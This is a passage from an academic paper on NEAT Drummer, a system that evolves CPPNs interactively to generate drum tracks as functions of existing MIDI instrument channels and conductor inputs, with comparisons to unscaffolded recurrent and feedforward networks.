equals the number of drums in the drum ensemble. the initial minimal topology has random connectivity yet always contains exactly one hidden node. this single hidden node ensures that initial patterns sound more interesting than percep- trons, but are still relatively simple. note that the internal topology is thus unrelated to the scaffold except insofar as it is affected by the number of inputs. thus the apparent “knowledge” of the provided song in the pattern output by the network is entirely a result of computing a function of the scaffold. neat drummer then inputs the selected channels into the cppn over the course of the song in sequential order and records the consequent outputs, which represent drums being struck. specifically, from time t = to t = l, where l is the length of the song, the inputs are provided and outputs of the cppn are sampled at discrete subintervals (i.e. ticks) up to l. individual notes input into the cppn from selected midi channels are rep- resented over time as spikes that begin high and decrease (i.e. decay) linearly (figure ). the period of decay is equivalent to the duration of the note. that way, the cppn “hears” the timing information from the supplied channels while in effect ignoring pitch, which is unnecessary to appreciate rhythm. by allowing the spikes to decay over their duration, each note becomes a kind of temporal coordinate frame. 
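the decaying-spike encoding of input notes described above can be sketched as follows (a hypothetical illustration, sampling four ticks per quarter note as in the system's figures):

```python
# rough sketch of the decaying-spike channel encoding (illustration only, not
# the actual neat drummer code): each note starts high and decays linearly over
# its duration, sampled at discrete ticks (four ticks per quarter note).
TICKS_PER_QUARTER = 4

def encode_channel(note_durations):
    """note_durations: list of durations in quarter notes (1 = quarter, 2 = half).
    returns one spike value per tick, decaying from 1.0 toward 0.0 over each note."""
    signal = []
    for dur_quarters in note_durations:
        ticks = dur_quarters * TICKS_PER_QUARTER
        # linear decay: quarter notes decay faster than half notes
        signal.extend(1.0 - i / ticks for i in range(ticks))
    return signal

# two quarter notes followed by a half note
print([round(v, 2) for v in encode_channel([1, 1, 2])])
```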
that is, the cppn in effect knows at any time where it is within the duration of a note by observing the stage of its decay. that in- formation allows it to create drum patterns that vary over the course of each note. interestingly, it is potentially useful also to input temporal patterns that are not part of the song itself. such patterns can provide additional structure to the drums by situating them within coordinate frames that describe how the user wants the song to vary at a meta-level. for example, inputting a simple linear function of time that indicates the position-in-song at each tick (figure a) in addition to the instrument channels means that the output is a function of both the song itself and the position-in-song. that way, the cppn can produce a drum track that shifts gradually from one motif to another over the course of the song. similarly, by inputting position-in-measure (figure b) or position-in-beat (figure c), the user can bias the output towards progressions across each mea- sure or beat. figure : channel input encoding. regardless of the instrument, each note in a sequence in any channel input to the cppn is encoded as a spike that decays over the duration of note. the pattern depicted in this figure shows how quarter notes decay faster than half notes, thereby conveying timing information to the cppn, which samples this pattern at discrete ticks. the variable-intensity row of boxes under the spikes depicts the intensity of the spike sampled at discrete time steps (i.e. four per quarter note). the intensity at each timestep is represented by the darkness in its respective column, which indicates how the input channel “sounds” to the cppn at that moment. in this paper, these additional inputs are called conductors to make a metaphor with the silent patterns expressed to an orchestra by its conductor. additional inputs that represent desired hidden contours beyond the pattern of the in- struments themselves give the user an unprecedented level of control over the nuances of the global output pattern. in fact, any arbitrary sequence can be input as a conductor, which in effect simply means a set of note spikes that are never actually heard. thus the pattern in figure , while introduced as an instrumental pattern, could also be a complex conductor pattern that suggests a particular underlying motif that the drums should elaborate. note that in neat drummer, by convention, conductor inputs that represent time are spikes that start low and attack, which conveys the idea of a timing signal, as opposed to notes from scaffolding inputs, which are decaying spikes. unlike cppn inputs, the level of each cppn output is interpreted as the volume (i.e. strength) of each drum strike. that way, neat drummer can produce highly nuanced effects through varying softness. two consecutive drum strikes one tick after another are interpreted as two separate drum strikes (as opposed to one long strike). to produce a pause between strikes, the cppn must output an inaudible value for some number of intervening ticks. because the cppn has one output for each drum, the end result of activating the network over t ticks is a drum sequence for each drum in the ensemble. an interesting aspect of this representation is that it does not make explicit use of recurrent connections. 
while recurrent networks are often noted for their ability to encode temporal patterns (dolson, ; todd and latham, ; (a) position-in-song (b) position-in-measure (c) position-in-beat figure : potential neat drummer conductor inputs. each figure depicts four measures of a conductor, which is a temporal coordinate frame optionally provided by the user to provide additional structure to the song. the simplest conductor (a) represents the current position in the song, suggesting a smooth transition across the entire song. position-in-measure (b) allows the cppn to know at every moment where it is within the current measure, which allows it to improvise patterns within measures and “understand” the measure structure of the song. similarly, the time within each four-tick beat can be input as well (c). conductors offer the user a subtle yet powerful means to influence the overall structure of the rhythm without the need for note-by-note specification. chen and miikkulainen, ), it is easier to simply express music as a function of an existing temporal pattern (i.e. the melody and harmony) and thereby affix one pattern to another without needing to learn the temporal synchronization itself. thus, while recurrence is well suited to temporal problems in which the inputs are not known a priori, because music is deterministic, recurrence is unnecessary; because the inputs are always the same, the outputs can simply be expressed as a function of the inputs. thus the cppn can potentially represent that function without recurrence. neat drummer generates each of the individuals in the initial population with the same set of inputs and outputs. however, the initial cppn weights and activation functions for each member of the population are decided randomly. in particular, every input is connected to every output with a randomized weight within [ − , ]. the activation function of each node is assigned randomly from among the following options: sigmoid, binary threshold, gaussian, linear, mul- tiplication, and sine. to encourage interesting patterns in the initial generation, a single hidden node with a random activation function is also connected into the network by splitting a randomly chosen connection. each song is divided into ticks (four per beat). at each tick, the vector of note spike values at that discrete moment of time for all the instruments is input. the cppn is fully ac- tivated and the value of each drum output is recorded so that all the generated drum tracks can be visualized or played instantaneously to facilitate interactive evolution, as explained in the next section. . drum pattern interactive evolution as shown in figure , neat drummer displays the set of candidate patterns visually after they are generated. it is important to note that unlike in many evolutionary experiments, pat- terns in the initial generation already sound appropriate. this initial high qual- ity underscores the contribution of the scaffold (i.e. the existing tracks) to the structure of the generated patterns. thus many appealing patterns already exist in the first generation, demonstrating how quickly appropriate accompaniment can be generated as a function of the source channels. in this way, a major contribution of this research is in showing how rich context can be leveraged by a connectionist system to successfully constrain output to appropriate patterns. the aim of evolution is thus to elaborate on such patterns. the user can choose to listen to any displayed pattern. 
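before continuing with how the user listens to and selects candidates, the initial-population setup described above can be sketched roughly as follows (a hypothetical illustration; the real system evolves these genomes with neat rather than plain dictionaries, and the multiplication activation is omitted here for simplicity):

```python
# hypothetical sketch of generating one initial cppn genome: every input fully
# connected to every output with weights in [-1, 1], node activations drawn
# from a small heterogeneous set, and a single hidden node added by splitting
# one randomly chosen connection.
import math, random

ACTIVATIONS = {
    "sigmoid":   lambda x: 1.0 / (1.0 + math.exp(-x)),
    "threshold": lambda x: 1.0 if x > 0.0 else 0.0,
    "gaussian":  lambda x: math.exp(-x * x),
    "linear":    lambda x: x,
    "sine":      math.sin,
}

def random_initial_genome(n_inputs, n_outputs):
    connections = [
        {"src": ("in", i), "dst": ("out", o), "w": random.uniform(-1.0, 1.0)}
        for i in range(n_inputs) for o in range(n_outputs)
    ]
    # split one connection with a hidden node carrying a random activation:
    # weight 1.0 into the new node, the old weight out of it
    split = random.choice(connections)
    hidden = {"id": ("hid", 0), "act": random.choice(list(ACTIVATIONS))}
    connections.remove(split)
    connections += [
        {"src": split["src"], "dst": hidden["id"], "w": 1.0},
        {"src": hidden["id"], "dst": split["dst"], "w": split["w"]},
    ]
    return {"hidden": [hidden], "connections": connections}

genome = random_initial_genome(n_inputs=3, n_outputs=3)  # e.g. 3 channels, 3 drums
print(len(genome["connections"]), genome["hidden"][0]["act"])
```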
when listening, the user can listen to the drum track alone or the drum track with its associated song. the visual presentation allows the user to quickly identify unappealing patterns without wasting time listening to them (e.g. wherein the bass is hit over and over again without pause). then either the user rates the individual patterns from which neat drum- mer chooses parents or the user selects a single parent of the next generation. further rounds of selecting and breeding continue until the user is satisfied. in this way, drum tracks evolve interactively. because of complexification in neat, they can become increasingly elaborate as evolution progresses. to encourage rapid elaboration over generations, the probability of adding a connection or node in neat was %. while this high probability would be deleterious in typical neat experiments (stanley and miikkulainen, , ), because drum tracks tend to follow song structure, this domain supports adding structure quickly. the mutation power, i.e. the maximum magnitude of weight change, was . and the probability of mutating the weight of an individual connection was %. finally, it is also important to note that in principle, the idea of representing musical structure in a connectionist system through scaffolding and conductors could be combined with a different evolutionary algorithm, or even a different training mechanism. thus while neat is a robust algorithm from which to demonstrate the power of scaffolding, the benefit of the scaffolding approach is likely compatible with other connectionist training approaches as well. . musical instrument digital interface neat drummer reads its input channels from musical instrument digital in- terface (midi) files. standard midi format (smf) is the most common midi filetype. smf format includes any number of tracks, each of which contains a sequence of instrumental events that occur in up to channels. each channel contains events that tell a particular instrument when and how loudly to play. according to the specification, most of the instrument sounds can occur in any of the channels with the exception of percussion, for which channel is reserved. neat drummer can input any combination of the channels into the cppn. that is, given a midi song, neat drummer generates a drum pattern as a function of any subset of the preexisting bass, guitar, vocals, etc. the resulting drum patterns are all explicitly functions of the inputs, so if part of a midi is input to the ann, the percussion follows the structure of that part. in this way, neat drummer can generate percussion for midi songs based on any subset of the preexisting instrument parts. experimental design this paper includes two sets of experiments. the first set focuses on the ca- pability of the scaffolding approach to generate drum tracks. the second set compares several other approaches with the scaffolding approach, both interac- tive and supervised, to provide an objective validation of the methodology. also, because music appreciation is largely subjective and auditory, the re- sults of neat drummer should be judged in part on that basis. therefore, midi files for every experiment reported in this paper are available online at http://eplex.cs.ucf.edu/neatmusic/. we invite readers to listen to the recordings and judge the natural quality of the percussion tracks discussed in sections and . . testing scaffolding the first set of experiments aim to determine whether drum tracks generated for particular songs are appropriate and nontrivial. 
the hope is that they respect the structure and transitions of the song yet do not mimic its instruments superficially. such sophisticated correspondence can confirm the capacity of functional relationships to generate plausible, human-like accompaniment. specifically, the first two experiments in this set investigate what happens when salient instrument channels are input alone to the cppn, which generates drum tracks for the folk songs johnny cope and oh! susanna. a follow-on experiment explores the consequences of inputting both instrument channels and conductors for the folk song oh! dem golden slippers. the question is whether the conductors add a dimension of variation that is seamlessly combined with the structure of the original song in the resultant drum track. a complex conductor is then input by itself into a cppn to isolate its effects and easily discern the functional relationship between the conductor and its outputs. . comparisons the second set of experiments is designed to scrutinize the power of scaffolding via input from the original song by attempting to achieve comparable output drum tracks without providing the original song as input. the aim is to illustrate the contribution of such scaffolding by investigating how other approaches fare without it. to control specifically for the contribution of the scaffold, each such attempt is still a variant of neat. that way, differences in performance are attributable to representation and scaffolding. in this spirit, first, ten -generation attempts are made to interactively evolve accompanying drums to johnny cope with neat without the drum channels from the song input into the network. instead, in the first five attempts, the network is recurrent and inputs only a bias. these attempts compare the capabilities of a recurrent network without any scaffolding to those of the scaffolded networks. in the last five attempts, the network is feedforward and provided only position-in-song as input. typical best results are presented. second, three target-based experiments form a more objective comparison. in these target-based runs, the aim is to reproduce a specific drum track that was previously evolved with neat drummer (i.e. with the scaffold provided) as an accompaniment to johnny cope. this drum track is set as the target for the target-based experiments, which do not have access to the scaffold. target-based runs rely on the same neat algorithm as neat drummer; however, the computer performs selection instead of a human user. selection is performed as in regular neat, wherein each individual in the population is assigned a fitness based on the sum-squared error between the target pattern and the attempted output: f = \sqrt{\left(\sum_{t=1}^{l} m - \sum_{t=1}^{l} (x_t - y_t)^2\right) / (l m)}, ( ) where m is the maximum possible error at any tick t, l is the number of ticks, x_t is the target note value at tick t, and y_t is the output value of the network at tick t. note that if there are multiple output tracks, this expression is applied to each and the fitness is the average. this fitness function is designed to approach . the better the output matches the target. the main question is how hard it will be for neat to evolve the very same rhythm that it evolved with the scaffold. three alternative representations are tested in this way:
• recurrent neural networks with only a bias input,
• feedforward networks with only a position-in-song conductor input, and
• feedforward networks with both a position-in-song conductor and a position-in-measure conductor input.
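returning to the fitness measure defined before the list above, a minimal sketch of that computation might look like the following (assumptions: a single output track, and note values normalized to [0, 1] so the worst per-tick squared error is m = 1):

```python
# small sketch of the target-matching fitness described above (illustrative;
# assumes one output track and per-tick squared error bounded by m).
import math

def target_fitness(target, output, m=1.0):
    """approaches 1.0 as the output pattern matches the target pattern."""
    assert len(target) == len(output)
    l = len(target)
    sq_err = sum((x - y) ** 2 for x, y in zip(target, output))
    return math.sqrt((l * m - sq_err) / (l * m))

target = [1.0, 0.0, 0.5, 0.0] * 4
print(target_fitness(target, target))               # perfect match -> 1.0
print(target_fitness(target, [0.0] * len(target)))  # poor match -> lower value
```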
in these target-based experiments, neat is run with typical successful parameter settings for regular non-interactive evolution (stanley and miikku- lainen, , ). in particular, the population size was and probability of adding a connection or node in neat was % and %, respectively. the mutation power, i.e. the maximum magnitude of weight change, was . and the probability of mutating an individual connection was %. the compatibil- ity coefficients for determining to which species individuals belong (stanley and miikkulainen, ) were c = . , c = . , and c = . . the compatibility threshold ct was adjusted dynamically in increments of . to maintain a stable equilibrium of eight species. if it turns out that any of these variants can evolve the target drum track, it will show that the scaffold is not necessary to provide a context. on the other hand, if none of the representation can evolve the target, it shows the critical contribution of the scaffold. in summary, experimental results are divided into two parts: first, the power of scaffolding is tested through interactive evolution; second, scaffolding is compared to several variants of neat drummer without scaffolding. the next section details the results of evolving interactively with the scaffold. scaffolding results while neat drummer can theoretically input a drum channel from a midi file and thereby generate variations of the percussion, this section focuses on drum tracks generated from inputting non-percussion instruments, like guitars and bass. thus the midi songs input in this section do not include drums in their original form. results in this section are reported through figures that are designed to demonstrate the relationship between the cppn inputs and outputs as the song progresses over time. in the figures that follow, the inputs are arranged in rows at the bottom of each depiction and the outputs are the rows above. time moves from left to right and each discrete column represents a tick of the clock. no instrument can play at a rate faster than the clock ticks. there are four ticks per beat in all songs tested. a slightly thicker dividing line between columns denotes a measure break. while all drum tracks include bass, snare, and hi-hat outputs, the number and types of drum outputs is unlimited in principle as long as the right sounds are available. recall that inputs are spikes; in the figures, their decays are depicted as decreasing darkness. in contrast, outputs represent volumes, wherein darker shading indicates higher volume. the main difference between inputs and out- puts is that a single note in the input may straddle several columns during its decay. outputs on the other hand are played as separate notes for every solid column. for an output drum to last for more than a single tick before the next drum attack, it must be followed by white (empty) columns. . inputting instrument channels alone figure shows individuals from generations one and generated for the folk song johnny cope. the relationship between the the bass, hi-hat, and snare and the three input channels is complex because each drum is related to all three inputs. note however that the instrumental patterns in measures three and four are highly related though not identical. slight differences exist between the piano pattern in measure three and measure four; this difference is reflected in the snare in both generations one and , which both slightly differ between the early parts of measures three and four. 
thus, the drum pattern’s subtle variation is correlated to the music because of their coupling, which evokes a subjective sense of appropriate style. at measure , the song changes sharply by eliminating the piano part. consequently, the cppn outputs also diverge from their previous consistent motifs. this strongly coupled divergence that is carried both in the tune and in the drums creates a sense of purposeful coordination, again yielding a natural, sophisticated feel. in this way, the functional relationship represented by the cppn causes the drums to follow the contours of the music seamlessly. generation , which evolved additional connections and six additional nodes, reacts particularly strongly to the elimination of the piano by significantly altering its overall pattern. in generation one, the shift is less dramatic, showing how the user interactively pushed evolution towards a sharper transition over those ten generations. generation also elaborates on the snare, making it harder-hitting in the later measures than in earlier ones. results from generation of oh! susanna are shown in figure . neat drummer produces similarly natural and style-appropriate rhythms for this song as well, suggesting its generality. because style is inherent in the original song’s channels, it transfers seamlessly to the drum track without any need for explicit stylistic rules. the result is an entertaining sound that could be attached to the original instrumental tracks without raising suspicion. it is interesting to listen to the songs with their generated drum tracks, which makes it possible to judge their subjective quality (a critical aspect of figure : johnny cope results. results are depicted from two different generations at two different parts of the song. the inputs from the original song, which are always the same, are shown at bottom. note the relationship between the inputs and the outputs, and between the first generation and the eleventh, which elaborates on the former. the motif in measures three and four is typical of the first part of the song until measure , when it switches to a different motif in both generations. thus, the figure gives a sense of the two predominant drum riffs exhibited in both generations. the main conclusion is that the output is a function of the input that inherits its underlying style and character. (these tracks are available at http://eplex.cs.ucf.edu/neatmusic/) figure : oh! susanna outputs. this pattern from measures three through six of oh! susanna is from generation of evolution. the network evolved hidden nodes and connections. near the end of measure four is a particu- larly improvisational riff in the snare that transitions to measure five. this riff is caused by variation in the piano and other inputs at the same time. as with johnny cope, the drum pattern sounds natural and styled correctly for this up- beat song. (this track is available at http://eplex.cs.ucf.edu/neatmusic/) musical appreciation). in the authors’ experience (which the reader can also judge), the generated tracks sound natural and lack the usual “mechanical” quality of computer-generated music. rather than repeating stock patterns, core motifs subtly vary and are interspersed with occasional unique flourishes. the personality of these variations is a byproduct of the personality that is implicit in the song itself, simply functionally transformed into a different local motif. 
this result further demonstrates that it is possible to inherit the natural character of one pattern by deriving another from it. of course, the evolved song also in part reflects the tastes of the human user. . inputting instrument channels and conductors figure highlights the effect of a conductor input on drum tracks produced for the song oh! dem golden slippers, which has a very similar beginning and end; all the measures in these parts are similar. thus the question is whether a conductor can introduce a sense of progression into the drums even though the song itself undergoes little discernable progression between the start and finish. figure (a) shows example drum output for this song without any additional conductor. thus, with only the song’s channels as inputs, the resultant drum pattern is also highly repetitive; the pattern in measures two and three is largely preserved much later in measures and (figure a). yet when a position-in- song conductor (figure a) is added as an input, the difference in drum patterns between measures two and three and measures and is dramatic, show- ing the powerful effect of the simple conductor (figure b). nevertheless, even (a) without conductor (b) with position-in-song conductor (c) with position-in-song and position-in-measure conductors figure : oh! dem golden slippers with and without conductors output drum patterns are shown for the song in one case when no conductor is input (a) and in the other where a position-in-song conductor is input (b, shown at bottom). the difference in resultant drum patterns shows that the conductor imposes a temporal progression on the drum track that does not derive from the structure of the song itself, demonstrating the power of conductors to subtly shape the structure of music. finally, when conductors indicating both position- in-song and position-in-measure are input simultaneously (c), progression is enhanced both throughout the song and within each measure. (these tracks is available at http://eplex.cs.ucf.edu/neatmusic/) figure : complex conductor. the conductor, which follows the pattern quarter quarter half, is shown at bottom. two three-part drum tracks that are functions this conductor are shown above it. while both drum tracks are dif- ferent, they are also both constrained by the underlying motif of the conductor. (these tracks are available at http://eplex.cs.ucf.edu/neatmusic/) though the drum pattern exhibits a sharply different motif at these two similar parts of the song, it sounds appropriate and sophisticated in both parts because it is a function of both the conductor and the instrument channels. thus it is a seamless variation on both influences simultaneously. it is also possible to combine multiple conductors to affect the structure of the output in more than one way. figure (c) shows the impact of inputting both the time in the song (figure a) and the time in the measure (figure b) together. the result is that not only do the later drum patterns differ from the earlier ones, but the interior of each measure varies in part independently of the instrumental scaffold. this effect is subtle because there are five instrumental tracks already influencing the pattern in each measure. however, closely comparing the drum measure patterns in (c) to (a) and (b) does reveal a discernable difference. finally, figure isolates the effect of a single complex conductor. 
the aim is to show explicitly how the output of the cppn is influenced by the incoming conductor, which expresses the same quarter quarter half pattern as in figure . thus, the outputs of two cppns that both take the same conductor are displayed for comparison. the main result is that the patterns of the two three- part tracks are both closely tied to the pattern of the conductor, wherein two short events are always followed by a long one. yet, within that framework, the patterns nevertheless differ significantly, illustrating the idea that a conductor is an implicit guide above which the pattern is realized, even if there is no explicit song at all. the next section exhibits the evolved cppns that produce the drum tracks in this section. . evolved cppns figure shows the cppns that were evolved for each of the evolved drum tracks in sections . and . . these networks range in complexity from to hidden nodes. interestingly, the subjective quality of the accompaniment does not seem to correlate to the complexity of the network. this perception makes sense because the functional relationship to the original instrument channels guarantees a tight coordination between drums and instruments. thus creating a plausible coordination does not require significant complexity. furthermore, if the underlying instrument channels themselves embody complex motifs and progressions, then the drums inherit the same complexity even if the cppn that relates them is not itself complex. what cppn complexity affords, rather, is a more complex relationship that is realized through more elaborate covariation. this subjective effect is subtle yet perceptible, suggesting that more sophisticated compositions may suggest to the human ear the complexity of the function relating their parts. yet the most important conclusion is that complexity is not essential to the cppn that relates one part to another because the complexity need only exist originally in the preexisting parts. to a large extent, that original complexity is transferred through the cppn to any affiliated drum pattern. the next section presents the results from the comparative experiments. comparison results while the results in section establish the quality of the tracks produced through scaffolding and the power of conductors to shape the output pattern, the question remains what is lost if the scaffold is not provided, as in prior au- tomated music generation techniques. can similar accompaniment be produced without a scaffold? this section validates the role of the scaffold by answering this question. typical results reported in this section can be heard at http://eplex.cs.ucf.edu/neatmusic/. . interactive evolution without scaffolding as described in section . , in the first set of comparisons, recurrent anns with only a bias input and feedforward anns with position-in-song as input were evolved interactively with no other inputs to accompany johnny cope. five -generation runs of both configurations were completed. figure shows typical best results from these runs. the best results from each set reveal a distinct difference between feedforward functions of position-in- song and evolved recurrent networks. the feedforward patterns never develop beyond monotonous unbroken gradients that gradually vary from loud to soft, and sometimes back again (figure a). these gradients often span the length of the song, or a large extent of it, and do not respect the measure structure. 
thus, overall, position-in-song alone is not enough to allow interactive evolution to (a) johnny cope gen. (b) johnny cope gen. (c) oh! susanna (d) oh! dem golden without conductors (e) oh! dem golden with the time conduc- tor (f) oh! dem golden with measure and time (g) quarter quarter half conductor (h) quarter quarter half conductor figure : cppn drum track generators. the evolved cppns that pro- duce every drum track shown in sections . and . are depicted. while the complexities vary, the quality of the output is similar because each produces a function of a preexisting song, thereby inheriting its qualities. activation func- tions are denoted by s for sigmoid, m for multiplication, g for gaussian, and l for linear. (a) typical best feedforward (b) typical best recurrent figure : typical best results from interactive evolution without scaffolding. best results from both types of representations tested are de- picted. the feedforward network only inputs position-in-song and produces unremarkable gradient patterns that do not follow the structure of music nor the johnny cope song. the recurrent network produces repeating motifs, but they are not synchronized with the measure and they do not vary with the song. in this way, removing the scaffold removes a major advantage of neat drummer. compete with evolving networks with a better scaffold. this result makes sense because the only input is the position in the song, so the only way to develop a significant number of changes is to add many hidden nodes, which would take far longer than generations. also, because cppns have no knowledge of when measures begin or end, the changes that do occur are difficult to evolve to align with the measure structure. in contrast, patterns interactively evolved with recurrent networks do display more complexity and more frequent changes over time (figure b). because feedback can lead to complex oscillations without the need for many hidden nodes, recurrent networks are better suited to producing complex variation early in evolution. however, the drum patterns are difficult to evolve to align with the contours of the music itself because the recurrent network is unaware of the music without the scaffold. furthermore, these networks suffer from the same problem with measure structure as the feedforward networks: even though some motifs repeat, they repeat at haphazard times relative to each measure, producing a disorganized aesthetic. for example, the bass drum in figure (b) is hit several times at the start of the first measure, but by the fourth measure, this motif has moved to the middle of the measure. the overall result is that while the recurrent networks produce more com- plexity, the patterns evolved by both networks are not synchronized with johnny cope and therefore sound disjointed, highlighting the critical role of the scaffold in tethering the accompaniment to the song itself. . targeted evolution without scaffolding in this experiment, the same two types of networks as in the previous section, i.e. one recurrent and one feedforward with position-in-song input, were evolved to match a target (figure c), which is a rhythm for johnny cope output by neat drummer with the scaffold in the th generation. clearly, the scaffold provides an advantage, but the question addressed by this experiment is how hard it is without the scaffold to approximate the same output even when the precise target rhythm is known a priori. 
because it is also known that the target rhythm took exactly generations to evolve when the scaffold was provided, the number of generations it takes these variant networks to produce the same output can be compared. each variant attempted to match the target in separate runs. figure shows typical best results from these runs after , neat gen- erations with a population size of . it turns out that the feedforward network suffered similar problems breaking away from simple gradients as in interactive evolution. while such a network theoretically could approximate the target pat- tern, it always became trapped on a local optimum because it is easy to reach a fairly high fitness simply by approximating the general loudness of drums over large contiguous periods of time. in other words, instead of attempting to dis- cover every individual beat, it discovers their average energy and paints that energy level across large swaths of time. thus this type of network is demon- strably ill-suited to producing such temporal patterns, either through interactive evolution or target-based evolution. however, interestingly, unlike in the -generation interactive experiment, after generations the recurrent network typically produces a repeating pattern that does synchronize with the measure structure. thus one conclusion is that recurrent networks can learn musical structure given sufficient time. however, unlike the target pattern, which displays distinct variations (e.g. in the latter half of figure c), the pattern produced by the best recurrent networks tend to repeat the same measure pattern throughout the song after the first generation (figure b). also, this repeating motif is only vaguely reminiscent of the target, which is likely because the recurrent network has trouble producing the subtle repetition with variation that the target inherited from its scaffold when it was evolved. because the feedforward results were disappointing, a third set of runs was attempted with a feedforward network that receives both position-in-song (a) typical feedforward champion (b) typical recurrent champion (c) target pattern figure : typical best results from target-based evolution without scaffolding. feedforward (a) and recurrent (b) results are depicted and the target pattern is shown in (c). the aim was to match the target. as this figure shows, neither variant successfully matched the target (which was evolved in neat drummer in generations) after , generations, although the recurrent variant evolved more complex patterns. this result confirms again the importance of the scaffold. figure : typical result from target-based evolution with position- in-song and position-in-measure inputs. the improvement in pattern complexity, and the adherence to measure structure, are apparent in comparison to figure a. by providing position-in-measure as input, evolution can easily produce patterns that follow the timing of measures, demonstrating the power of conductor inputs. however, without the scaffolding inputs from johnny cope, the drum pattern still does not match the target despite its regular structure. and position-in-measure conductors as input. the idea is to relieve the network of the need to discover the measure structure of music on its own, exploiting the power of conductors. in fact, as figure shows, providing position-in- measure typically dramatically improves the complexity of the output and allows it to break out of the local optima that trap such networks without position-in- measure. 
indeed, the feedforward output resembles the output of the recurrent network and respects measure structure, demonstrating the contribution of the additional conductor. yet because even such conductors do not contain the same song-specific information as the scaffold, like the recurrent network, the output pattern is only marginally reminiscent of the actual target pattern, and is also more repetitive. thus, after , generations, none of the variant networks are able to suc- cessfully match a target pattern that was discovered in only generations. fig- ure summarizes this result by depicting fitness over time in the three variants, each averaged over runs. whereas a fitness of . denotes a perfect match, none of the variants reach a fitness of even . . interestingly, despite the appar- ent aesthetic inferiority of the feedforward network with only position-in-song, on average its fitness approaches that of the other two variants, demonstrating why local optima characterized by smooth volume gradients attract it. although their final fitness levels are not far apart, the differences between some of the variants are significant. in particular, recurrent networks pro- duce significantly higher fitness than position-in-song alone throughout the run (p < . ), and feedforward with the position-in-measure input outperforms feedforward without it (p < . ). however, interestingly, by the end of each run, recurrent networks on average are not significantly better than feedfor- figure : fitness over time of the three variants in target-based evolution. the increase in fitness over , generations of evolving the three variant representations is shown, averaged over runs for each. a perfect fitness of . would mean the target is matched perfectly. none of the variants exceed . fitness because the search is too unconstrained without the scaffold. ward with position-in-measure, showing that feedforward networks can match the performance of recurrent networks on this task when provided information on the structure of music. however, most significantly, none of the variants can produce a pattern close to the target within , generations. the main conclusion from both interactive and target-based comparisons is thus that the scaffold provides critical infrastructure. in effect, it constrains the search to patterns that relate to the original song. if accompaniment is to be evolved for an existing song, inputs from that song should be provided as a scaffold. without such context, the accompaniment becomes decoupled from the song regardless of the representation. a further result is that conductors make it easier to discover patterns that respect musical structure. while the recurrent network does eventually discover a measure-synchronized motif in the target-based runs, it takes hundreds of gen- erations to achieve such synchrony. on the other hand, when time-in-measure is provided as a conductor, measure structure is respected from the start. overall, this set of experiments confirms the contribution of the scaffold and suggests that it should be a standard facet of any network-based attempt to generate musical accompaniment. discussion while the sheer size of a composition containing multiple interrelated tracks suggests its complexity, the results with neat drummer show that by encoding some parts as functions of others, much of the apparent complexity is removed. while each drum track contains hundreds of drum strikes over several minutes, the networks that represent them contain on average only connections. 
the most salient feature of drum tracks generated in this way is that they sound natural, hinting that the functional relationship may reflect a realistic aspect of human musical creativity. . implications of scaffolding the idea of scaffolding, i.e. deriving several parts from a preexisting pattern, means that the most profound effort in musical creativity can be largely con- centrated on a relatively small part of the overall composition, which can then provide a scaffold for other parts. the interrelationships among the different in- struments of a song can be expressed as functions of one or more scaffold tracks, which is the approach taken in this paper. while effective, it is interesting that the direction of the relationship could also go the other way: melody and har- mony can by expressed as a function of rhythm. in fact, harmony can also be a function of melody and vice versa. thus there is no apparent essential starting point, though some may be more natural than others depending on the context. nevertheless, it is clear that something must form the scaffold from which all other accompaniment is derived. thus, as long as some seed is introduced, the accompaniment can follow smoothly. the main contribution of this paper is thus to advance automated music gen- eration by introducing an effective method for representing some parts of a song with respect to others in a connectionist framework. this approach significantly simplifies the problem of constraining accompaniment appropriately. neverthe- less, of course, different styles of accompaniment may be more or less difficult to discover, even with the scaffold. for example, can convincing jazz walking bass be generated even in the context of other jazz instrumental tracks? cer- tainly it is possible that the interactive evolution process can discover a function that expresses a particular style, yet the likelihood of such a discovery depends on to what extent the style is already embodied by the existing scaffold. the extent to which the scaffold contains essential stylistic cues, combined with the complexity of the function that would create the right style in the absence of such cues, determines the difficulty of the discovery. thus this work does not diminish the considerable human effort required to acquire specialized styles of accompaniment. another intriguing possibility is that specific conductors can be developed that constrain output to a desired style. thus, while discovering a style based on the scaffold alone may be difficult in some cases, providing both the scaffold and carefully chosen conductors can potentially simplify the search, just as conductors in this paper convey a priori measure and beat structure. interestingly, once a cppn is found that yields a particular accompaniment style, it can potentially be reused with other tracks. thus, once discovered, stylistic accompaniment may be transferable, which is an important topic for future research. overall, then, while some styles of accompaniment are probably harder to discover than others, the scaffold reduces the space that must be searched. nevertheless, although automated music generation may benefit from this principle, it still does not solve the fundamental problem of generating the scaffold itself. what kind of process can create the initial pattern? interestingly, it is possible that even an individual instrumental part can be generated from an even more abstract underlying scaffold, i.e. 
one that is never actually heard, like the conductors in this paper. these abstract patterns represent musical structures below the level of the explicit notes and pauses. rather, they are the shape of the fabric upon which such notes are woven. an interesting hypothesis is that human composers and songwriters construct at a cognitive level such hidden "conductors" before the salient musical pattern emerges as notes and rhythms. it may be difficult to discern, but several simple underlying functional motifs that cannot be expressed in musical notation may underlie apparently richly textured musical masterpieces. perhaps this hidden factor plays a role in our appreciation of music; when the many threads of a symphony stand out in their synchronized majesty, perhaps the brain is appreciating the simple hidden scaffold that unifies them in purpose. another complementary possibility is that even a long serial progression of notes is actually a series of motifs that are functions of each other. this view suggests that a scaffold or conductor underlying a long melody may itself be short and compact. these considerations lead to the philosophical question of how little is necessary to encode a "human essence" that functionally-related parts can inherit. perhaps only a very simple and short hidden function is all that is essential to the subsequent unfolding of a symphony. the size of the smallest necessary seed is practically important because the smaller it is, the easier it will be in the future to create entire compositions automatically. for example, if an entire complicated melody can be generated from a simple initial function, and the rhythm and harmony can be generated from the melody, then a future system might require a human to merely suggest the barest motif, such as a gradual attack followed by several step-wise decays, and from that point elaborate an entire composition through scaffolding. another important ingredient of neat drummer that is not automated is the user's input. the product of a neat drummer session thus in part reflects the creativity of the user, and not just the search algorithm. it is an interesting question whether the user can be entirely eliminated, allowing the computer to compose completely on its own. however, while neat drummer does not eliminate the need for human input, what it does eliminate is the need for human expertise by shifting the creative focus from composition to opinion (i.e. what sounds the best). in this way, a significant obstacle to widespread, high-quality musical creativity is removed. thus the promise of this work is that it opens a new avenue to computer-generated music that raises interesting questions about how music is encoded and generated by humans. the role of recurrence in connectionist music the experiments comparing recurrent networks to scaffolded cppns in section yield interesting insight into the capabilities and limitations of recurrent neural networks applied to generating musical accompaniment. in particular, recurrent anns do produce complex motifs, but it is difficult to synchronize them to musical structure. while a cppn with a position-in-measure conductor can right away produce patterns that respect measures, it takes hundreds of generations to achieve the same with recurrent networks, which is too long for a human performing 